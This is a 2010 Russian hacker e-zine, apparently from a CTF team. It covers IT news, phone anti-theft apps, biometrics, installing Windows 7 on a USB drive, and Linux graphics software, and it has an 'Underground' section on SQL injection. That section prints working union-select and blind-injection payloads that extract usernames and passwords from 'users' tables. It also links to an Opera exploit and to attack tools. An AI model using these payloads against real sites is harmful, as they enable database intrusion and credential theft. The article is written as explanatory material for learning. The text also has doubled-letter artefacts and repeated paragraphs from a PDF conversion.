13
U U F F O O l l o o g g i i s s t t i i c c s s magazine v.2.20.03.10 Ставим Windows на usb-hdd

Ufo2

Embed Size (px)

Citation preview

Page 1: Ufo2

UUFFOOllooggiissttiiccssmagazine v.2.20.03.10

Ставим Windows на usb-hdd

Page 2: Ufo2

ВВ ээттоомм ннооммееррее::

NNeewwssBBlloocckk:: ННооввооссттии IITT--ММиирраа ии ннее ттооллььккоо

SSeeccuurriittyy&&LLiiffee:: ЗЗаащщииттаа ппооррттааттииввнныыхх ууссттррооййссттвв ((ччаассттьь 22))

SSooffttRReevviieeww:: ГГррааффииккаа вв LLiinnuuxx

IIQQ:: ББииооммееттрриияя ((ччаассттьь 11)) ГГееннииааллььннооее ппррооссттоо:: WWiinnddoowwss ннаа uussbb--hhdddd

UUnnddeerrggrroouunndd:: SSQQLL--iinnjjeeccttiioonn

Для быстрого возвращание к оглавлениювоспользуйтесь этой миниатюрой

Page 3: Ufo2

NNeewwssBBlloocckkУязвимость в Opera 10.x

Не так давно по рунету начал "гулять" эксплоит для Opera 10.x, затем появилась информация о уязвимости этого браузера, которая позволяет злоумышленнику аварийно завершить работу браузера или выполнить произвольный код. На момент публикации журнала лекарства не было, редакция рекомендует не ходить по не знакомым сайтам через этот браузер.

Эксплоит можно посмотреть тут: http://paste.org.ru/?fkb9yg

"Борьба с пиратством".Дело "Torrents.ru".

Самая нашумевшая новость дней минувших, это конечно же приостановка делегирования домена torrents.ru по причине нарушения авторских прав. Что весьма сомнительно, ведь администрация сайта всегда следила за соблюдением авторских и смежных прав. Но тем не менее, обвинение было представлено со ссылкой на ч.2 ст. 146 УК РФ.Сам же сайт перехал на новое место http://rutracker.org и по словам администрации, возвращаться в зону .ru не собирается.

CDlinux 0.9.6

12 апреля вышел новый дистрибутив linux "для сис.админов". Запустив LiveCD вы увидете окружение XFCE и несколько популярных приложений и множество "админских" утилит.Образ дистрибутива весит всего 225 Мб.Скачать можно тут.ftp://distro.ibiblio.org/pub/linux/distributions/cdlinux/releases/0.9.6/CDlinux-0.9.6_CE.iso

DEVCONF::PHPConf

17 мая в Москве пройдет конференция DEVCONF::PHPConf.Зарегистрироваться и выступить может любой желающий. Все, что требуется это зарегистрироваться по адресуhttp://devconf.ru/register/index/phpconf/ и заплатить организационный взнос 3000 рублей.

Page 4: Ufo2

SSeeccuurriittyy&&LLiiffeeЗЗаащщииттаа ппооррттааттииввнныыхх ууссттррооййссттвв ((ччаассттьь 22))

В этой части мы рассмотрим такую насущную проблему как кража и способы сигнализирования телефона при попадении в "плохие руки".

В телефонах SonyEricsson, отлично зарекомендовала себя программаSSEEGGuuaarrdd, вот ее характеристики:Требуемая ФС: >jp-7.2Возможности: -Отправка смс на другой телефон при вводе неверного pin-кода.-Идентификация sim-картыОсобенности:Для автозапуска приложения необходимо установить сертификат ХалмераОф. сайт: http://grafmoto.narod.ru/seguard.htm

У Siemens, защита выглядит немного сложнее. Лишь из-за того, что используются elf-приложения, а не java.

Одним из самых популярных "противоугонных" эльфов является ssmmss aallaarrmm..Возможности:-После смены сим-карты отправляется смс с данными эльфа mini gps в формате: "номер,местоположение,заряд"-Поддержка нескольких сим-картОсобенности:-Необходимо вшить в телефон ELFpack. Прочитать об этом можно тут http://www.siemens-club.org/faq/index.php?Action=showarticle&faqID=231

Скачать: http://forum.allsiemens.com/viewtopic.php?p=988982

Пользователям телефонов фирмы Nokia следует обратить внимание на приложение под Symbian, GGuuaarrddiiaann..Его возможности:-Отправка смс при смене sim-карты.-Для телефонов с GPS, определение координат.Требования: Symbian 9.1,9.2,9.3Особенности:Программа является платной.

Скачать: http://allnokia.ru/symbsoft/download.php?id=1958Вывод: Ни одна из перечисленных программ не дает 100% эффекта нахождения телефона. Но все же, если вор сразу не прошил аппарат, попытался ввести pin или поменял карту, есть надежда локализовать место и силами правоохранительных органов его(телефон) вернуть.

Page 5: Ufo2

IIQQББииооммееттрриияя ((ччаассттьь 11))

Биометрия (англ. Biometrics) — технология идентификации личности, использующая физиологические параметры субъекта (отпечатки пальцев, радужная оболочка глаза и т. д.).

Биометрия представляет собой совокупность автоматизированных методов и средств идентификации человека, основанных на его физиологической или поведенческой характеристике.

Например: почерк (в том числе и клавиатурный), голос или походка.Схема работы

- Идентификация по любой биометрической системе проходит четыре стадии:

- Запись — физический или поведенческий образец запоминается системой;

- Выделение — уникальная информация выносится из образца и составляется биометрический образец;

- Сравнение — сохраненный образец сравнивается с представленным;

- Совпадение/несовпадение — система решает, совпадают ли биометрические образцы, и выносит решение.

Следует отметить, что в памяти компьютера хранится в специальной базе данных цифровой код длиной до 1000 бит, который ассоциируется с конкретным человеком, имеющим право

ООссннооввнныыее ссввееддеенниияяОбычно при классификации биометрических технологий выделяют две группы систем по типу используемых биометрических параметров. Первая группа систем использует статические биометрические параметры: отпечатки пальцев, геометрия руки, сетчатка глаза и т. п. Вторая группа систем использует для идентификации динамические параметры: динамика воспроизведения подписи или рукописного ключевого слова, голос и т. п.

Биометрические технологии основаны на биометрии, измерении уникальных характеристик отдельно взятого человека. Это могут быть как уникальные признаки, полученные им с рождения, например: ДНК, отпечатки пальцев, радужная оболочка глаза; так и характеристики, приобретённые со временем или же способные меняться с

Например: почерк (в том числе и клавиатурный), голос или походка.Схема работы

- Идентификация по любой биометрической системе проходит четыре стадии:

- Запись — физический или поведенческий образец запоминается системой;

- Выделение — уникальная информация выносится из образца и составляется биометрический образец;

- Сравнение — сохраненный образец сравнивается с представленным;

- Совпадение/несовпадение — система решает, совпадают ли биометрические образцы, и выносит решение.

Следует отметить, что в памяти компьютера хранится в специальной базе данных цифровой код длиной до 1000 бит, который ассоциируется с конкретным человеком, имеющим право

Page 6: Ufo2

IIQQустройство, используемое в системе, считывает определённый биологический параметр человека. Далее он обрабатывает полученное изображение или звук, преобразовывая их в цифровой код. Именно этот ключ и сравнивается с содержимым специальной базы данных для идентификации личности.

Параметры биометрической системы: FAR (False Acceptance Rate) – Ошибка первого рода. Система предоставляет доступ незарегистрированному пользователю. FRR (False Rejection Rate) – Ошибка второго рода. доступ запрещен зарегистрированному в системе человеку. На сегодняшний день все биометрические технологии являются вероятностными, ни одна из них не способна гарантировать полное отсутствие ошибок FAR/FRR.

Отпечатки пальцев или Дактилоскопи ́я (от греч. δάκτυλος — палец и σκοπέω — смотрю, наблюдаю) — метод идентификации человека по отпечаткам пальцев (в том числе по следам пальцев рук), основанный на уникальности рисунка кожи. Основан на идеях англичанина Уильяма Гершеля, выдвинувшего в 1877 году гипотезу о

неизменности папиллярного рисунка ладонных поверхностей кожи человека. Эта гипотеза стала результатом долгих исследований автора, служившего полицейским чиновником в Индии.В каждом отпечатке пальца можно определить два типа признаков — глобальные и локальные. Глобальные – это те, которые можно увидеть невооруженным глазом.Данный метод очень хорошо изучен. Технические средства, основанные на данном методе биометрии, широко распространены, что делает их применение легким и не дорогим.

Однако, в одном из выпусков программы «Разрушители легенд» («Myth Busters») на одном из сканеров была произведена компрометация системы отпечатков пальцев двумя методами. Первый метод заключался в создании точной копии пальца с помощью гипса и специализированного геля. Второй метод до ужаса прост: отсканировать, отретушировать, распечатать.

Известен прецедент, когда по отпечатку пальцев органы правосудия ошибались и невиновный отвечал за деяния преступника.

По независимым данным Washington Profile, Телекомпания CBS сообщила о необычной истории. В штате Пенсильвания был арестован некий Рик Джексон (Rick Jackson), который был обвинён в убийстве своего друга. На месте преступления остались кровавые отпечатки пальцев и экспертиза пришла к выводу, что эти отпечатки принадлежат Джексону. Суд приговорил Джексона к пожизненному тюремному заключению без права помилования. Джексон категорически отрицал свою вину. Его родители наняли адвоката, который привлек к сотрудничеству бывших дактилоскопистов ФБР (FBI), которые смогли доказать, что отпечатки, найденные на месте убийства, принадлежали другому человеку, хотя и имели невероятное сходство с отпечатками Джексона. В результате, Джексон обрел свободу.

Клавиатурный почерк — это набор динамических характеристик работы на клавиатуре. Исследования показали[1], что клавиатурный почерк конкретного пользователя обладает стабильностью. Это позволяет с большой достоверностью идентифицировать пользователя, работающего с

Page 7: Ufo2

IIQQклавиатурой.Под этим понятием понимается система индивидуальных особенностей начертаний и динамики воспроизведения букв, слов и предложений на клавиатуре. Следует заметить, что применение способа идентификации по клавиатурному почерку целесообразно только по отношению к пользователям с достаточно длительным опытом работы с компьютером и сформировавшимся почерком работы на клавиатуре, т. е. к программистам, секретарям и т. д.

Уникальные особенности клавиатурного почерка выявляются двумя методами:

- по набору ключевой фразы – производится единовременно (периодически) для идентификации/аутентификации пользователя.

Контролируемыми параметрами ввода является время t1, t2, t3, ...., tn нажатия каждой клавиши из последовательности клавиш, соответствующей парольной фразе, а также интервалы времени между нажатием соседних клавиш t1, t2, t3, ...., tn-1, как показано на рисунке.

- по набору «свободного» текста – производится постоянно в течении всего времени работы. Основывается на индивидуальных особенностях набора символов: контроль парных нажатий, процент ошибок и другие параметры.

Для большинства систем биометрии существуют следующие алгоритмы распознавания:

- на основе геометрических методов распознавания, использующих различные меры близости предъявляемого вектора V к биометрическому эталону VС (мера Хэмминга, Евклидова мера и др.);

- на основе применения искусственных нейронных сетей (ИНС).

В следующих статьях я расскажу об остальных методах и способах компрометации. А также буду размещать свои наработки в области клавиатурного почерка.

©©ттааттььюю ппррееддооссттааввиилл::

ВВааллееннттиинн ЗЗллыыддннеевв

Page 8: Ufo2

виртульный диск.

Распаковался? Замечательно! Теперь нам нужен образ диска с True Image Home. Грузимся, выбираем клонирование диска, выбираем с какого диска клонируем, конечно же это наш виртуальный, и куда - это внешний. Так же можно отредактировать соотношение клона. Жмем пуск. И ждем.

ГГееннааллььннооее ппррооссттооWWiinnddoowwss ++ UUSSBB--HHDDDD

Ингридиенты.Итак, что нам нужно. Во-первых, я предлагаю первый этап установки сделать в виртуальной машине которая поддерживает как минимум загрузку с iso-образа(или физического привода) и с возможностью подключить usb-устройство.Затем, качаем специальный образ Windows 7 от тов. aleks200059.И еще нам понадобится isoшка от Acronis под названием True Image Home и примерно 15 гб на внутреннем жестком диске.

Варим.Пришло время приступить к самому процессу инсталяции. Запускаем виртуальную машину (я выбрал VirtualBox), подсоединяем iso-образ и внешний hdd, так же необходимо создать виртуальный жесткий диск размером 15 гб (можно больше). Запускаем установку и ждем первой перезагрузки, т.е. ждем пока wnidows

Вот и все.Итак, если клонирование прошло успешно, выключаем виртуальную машину. Перезагружаемся и грузимся с внешнего hdd, windows продолжит установку и, как бы это грустно не было, привяжется к вашему железу, это означает, что она будет работать только с подобными машинами при попытке подключить, скажем, windows устанавливаемой на ноутбуке одной модели к другой, вы получите BSOD при загрузке. Данное руководство рекомендуется использовать в том случае если вам не хочется\нет возможности поставить 7-ку на стационарный жесткий.

В этой статье мы познакомим Вас с хитростью установки Windows 7 на внешний жесткий диск. По умолчанию эта функция не поддерживается, если вы попробуйте установить windows на usb-hdd непременно появится оповещение о не возможности установки на usb и ieee диск.

Page 9: Ufo2

UUNNDDEERRGGRROOUUNNDDSSQQLL--iinnjjeeccttiioonn

Blind SQL-injection или слепое внедрение операторов SQL - способ нападения на базу данных в обход межсетевой защиты.Эксплуатируя уязвимость SQL Injection «слепым» методом,атакующий манипулирует логикой работы приложения(true/false).Пример:http://site/?param=-1 OR 1=1http://site/?param=-1 OR 1=1--...http://site/?param=-1'http://site/?param=-1' AND 1=2...http://site/?param=-1' OR '1'='1...http://site/?param=-1"/*...http://site/?param=2http://site/?param=1

Какими бывают?SQL Injection - классическая эксплуатация уязвимостей, внедрение операторов SQL.

Выделяют два вида SQL Injection1. SQL Injection в строковом параметреПример:SELECT * from table where name = "$_GET['name']"SELECT id, acl from table where user_agent = '$_SERVER["HTTP_USER_AGENT"]'

2. Sql Injection в цифровом параметреПример:SELECT login, name from table where id = $_COOKIE["id"]SELECT id, news from table where news = 123 limit $_POST["limit"]

Пример Double-Blind SLQ-injection:http://site/?param=-1 AND benchmark(2000,md5(now()))

http://site/?param=-1' AND benchmark(2000,md5(now()))--

Немного статистикиПо статистике консорциума Web Application Security Consortium (WASC) 39% сайтов whitebox содержат такую уязвимость как внедрение операторов SQLНемного печальнее выглядит статистика одной из ведущей отечественной компании в области информационно безопасности, Positive Techologies - 68% сайтов whitebox подверженны внедрению sql-кода

SQL-Injection - один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.

Page 10: Ufo2

• Вторая запись /?id=1 union select table_name,123 from (select row_number() over (order by name) as rownum, name from users) as t where t.rownum=2PostgreSQL • Первая запись /?id=1 union select name, null from users limit 1 offset 0 • Вторая запись /?id=1 union select name, null from users limit 1 offset 1 ИЛИ • Первая запись /?id=1; select name, 123 from users limit 1 offset 0 • Вторая запись /?id=1; select name, 123 from users limit 1 offset 1

Особенности эксплуатации для разных СУБД

Пример MySQL:SELECT * from table where id = 1 union select 1,2,3Пример PostgreSQL:SELECT * from table where id = 1; select 1,2,3Пример Oracle:SELECT * from table where id = 1 union select null,null,null from sys.dual

MySQL 4.1>= • Первая запись /?id=1 union select name,123 from users limit 0,1 • Вторая запись /?id=1 union select name,123 from users limit 1,1MSSQL • Первая запись /?id=1 union select table_name,123 from (select row_number() over (order by name) as rownum, name from users) as t where t.rownum=1

Blind SQL-injectionЗа один запрос можно подбирать до 12-ти символов (метод Qwazar X07’09)Подбор первого символа у первой записи в таблице/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,

UUNNDDEERRGGRROOUUNNDDSSQQLL--iinnjjeeccttiioonn

Page 11: Ufo2

Автоматизированный поиск SQL-Injecton

Трудно искать черную кошку в темной комнате, особенно если ее там нет, поэтому рекомендуется использовать автоматизированный поиск SQL Injection, напрмер, при помощи MaxPatrol

(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 union select 2),(1)))))))))))))

• В случае, если таблица «users» содержит колонку «pass» и первый символ первой записи этой колонки в диапазоне [0-9a] то, СУБД вернет ошибку. В противном случае единицу т.е. запрос будет являться корректным.

Или sqlmap (http://sqlmap.sourceforge.net/) • Полная поддержка: MySQL, Oracle, PostgreSQL и Microsoft SQL Server • Частичная поддержка: Microsoft Access, DB2, Informix, Sybase и Interbasesqlus (http://sqlsus.sourceforge.net/) • Реализована поддержка только MySQLbsqlbf-v2 (http://code.google.com/p/bsqlbf-v2/) • Больше ориентирована под слепые SQL-инъекции. Реализована поддержка: MySQL, Oracle, PostgreSQL и Microsoft SQL Server

Так же много интересного можно найти тутhttp://www.milw0rm.com/papers/

UUNNDDEERRGGRROOUUNNDDSSQQLL--iinnjjeeccttiioonn

ссттааттььяя ннааппииссааннаа ппоо ммааттееррииааллаамм ddeevvtteeeevv..bbllooggssppoott..ccoomm//

Page 12: Ufo2

SSooffttRReevviieewwГГррааффииккаа вв LLiinnuuxx

InkscapeРедактор векторной графики при помощи которого можно создавать как художественные так и технические иллюстрации. Так же огромным плюсом для этой программы является ее работа с форматом SVG(Scalable Vector Graphics), развиваемым консорциумом W3C. Так же Inscape используется для создания презентаций, веб-графики(банеры, пиктограммы, кнопки).

Текущая версия: 0.47.0Оф.сайт: www.inkscape.org

GIMP(GNU Image Manipulation Program)

Одна из самых известных opensource программ для создания и редактирования растровой графики. Так же его называют аналогом Photoshop. GIMP оснащен массой инструментов как для работы с фотографии так и для рисования. Так же GIMP можно автоматизировать при помощи сценариев на таких языках как: C#, Java, Perl, Python, Ruby, Tcl.

Текущая версия: 2.7.3Оф. сайт: www.gimp.org

XnviewКроссплатформенная программа просмотра изображений. Поддерживает более 400 форматов фалов. По мимо стандартных функций просмотра умеет редактировать изображенние, а именно вырезание, копирование выделенной части, поворот, изменение размера, преобразование цветов, применение различных эффектов к изображению, коррекция "эффекта красных глаз"

Текущая версия: 1.70Оф.сайт: www.xnview.com

Page 13: Ufo2

Выпуск подготовил: Дмитрий Катаргин ([4Ex0FF]Fang)

Как нас найти?Официальный сайт - www.ufoctf.ru Google группа - groups.google.ru/group/ufoctf2009E-mail: [email protected]

Если у вас есть интересная статья, предложение по улучшению качества журнала, вопросы, пишите нам! Будем рады рассмотреть и ответить.

Спасибо за внимание, оставайтесь с нами!С уважением, команда ufologistics.

UFOlogistics

Журнал создан с помощью:

ufologistics © 2010